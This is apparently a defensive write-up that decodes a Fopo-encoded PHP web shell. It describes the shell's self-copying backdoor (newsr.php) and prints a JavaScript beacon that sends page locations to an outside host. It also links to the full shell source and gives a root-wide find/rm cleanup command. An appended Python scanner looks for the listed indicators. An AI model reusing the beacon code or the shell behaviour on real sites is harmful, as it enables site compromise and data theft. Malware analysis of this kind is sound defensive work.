I decided to decode a PHP web shell that was encoded with the Fopo online encoder. It is called "ATTACK SHELL PRiV9" or "K2ll33d Shell 2019" and belongs to "r00t.info".
PHP web shell:
Encoded source:
It might be interesting to you to see what we encounter!
As you can see, it contains backdoor malware that copies itself as newsr.php into every directory of the website and sends its location and info to the address "http://r00t.info/ccb.js" and to the mail address "byhero44@gmail.com", with the password "a4cd2905b660e8b1bc73a7c4571252da", which is stored as an MD5 hash.
ccb.js contains:
a=new/**/Image();a.src='http://www.expoilt.com/yaz.php?a='+escape(location.href);
I changed all http to hxxp to prevent execution and harm to your system, so if you want to run it you need to change the values back to the original.
Other names and addresses found in the source are:
Turkey Cyber Army team
https://expoilt.com/yaz.php?a=
http://r00t.info/txt/lamer.txt
k2ll33d
Indoxploit Shell
Sym Bypass 403 Shell
Berandal Indoxploit Shell V2.1
Premium Wso Shell
Whmcs Killer
Mobile Shell V.05 2018 Private
K2ll33d Shell
3turr ~ Sh311
Server V-8 Attack Shell
Bypass shell
Wordpress Mass Change Password 2019
Smevk_pathan Shell V3 Bypass Shell
Leaf Php Mailer V.2.7
Bloodsecurity Bypass Shell
Anon Priv9 Shell
Wso Shell
R00t.info Priv7 Shell New 2016
Wso Shell 4.2.2
G5 Private Bypass Shell
If you have used it, you need to know that your entire website is infected.
The solution to clean it:
Look for "newsr.php" files in every directory of your website and remove them.
If you are using Linux, use this command:
find / -name newsr.php -exec rm -rf {} \;
Also, if you uploaded the shell file, delete it completely.
And also delete the CGI shell files that were created by the PHP web shell.
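To support the cleanup steps above, here is an added read-only scanner (not part of the original post or of the shell source) that walks a web root and reports dropper copies by file name plus any file containing the indicators quoted in this write-up. The eval()/base64_decode() heuristic for still-encoded copies is my own assumption, and the sample tree built in demo() is constructed.

```python
import os
import tempfile
from pathlib import Path

# Indicators quoted in the write-up above: the name the dropper copies itself as,
# the beacon URL, the mail drop, and the MD5 hash. The scanner only reports.
DROPPER_NAMES = {"newsr.php"}
INDICATORS = [b"r00t.info/ccb.js", b"r00t.info/txt/lamer.txt",
              b"expoilt.com/yaz.php", b"byhero44@gmail.com",
              b"a4cd2905b660e8b1bc73a7c4571252da"]
# Assumed heuristic (not from the page): a still-encoded shell hides the strings
# above, so also flag PHP files that contain both eval( and base64_decode(.
ENCODED_WRAPPER = (b"eval(", b"base64_decode(")

def scan_webroot(root, max_bytes=2_000_000):
    """Walk `root`; return a sorted list of (relative path, reason) to review."""
    root = Path(root)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            if name in DROPPER_NAMES:
                findings.append((rel, "dropper copy: filename matches"))
                continue
            try:
                data = path.read_bytes()[:max_bytes]  # cap reads on huge files
            except OSError:
                continue
            hits = [i.decode() for i in INDICATORS if i in data]
            if hits:
                findings.append((rel, "indicator(s): " + ", ".join(hits)))
            elif name.endswith(".php") and all(w in data for w in ENCODED_WRAPPER):
                findings.append((rel, "heuristic: eval()+base64_decode() wrapper"))
    return sorted(findings)

def demo():
    # Constructed sample web root: a clean page, a dropper copy in a subdirectory,
    # a decoded shell carrying the beacon URL and mail drop, and an encoded shell.
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "index.php").write_text("<?php echo 'hello'; ?>")
        (root / "img").mkdir()
        (root / "img" / "newsr.php").write_text("<?php /* copied dropper */ ?>")
        (root / "up.php").write_text(
            "<?php $u='hxxp://r00t.info/ccb.js'; $m='byhero44@gmail.com'; ?>")
        (root / "enc.php").write_text(
            "<?php $x='...'; eval(gzinflate(base64_decode($x))); ?>")
        return scan_webroot(root)
```

Review the report and delete only what you have confirmed; the heuristic can also flag legitimate obfuscated PHP.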
You can find the full source code at https://pastebin.com/bmrrDeAb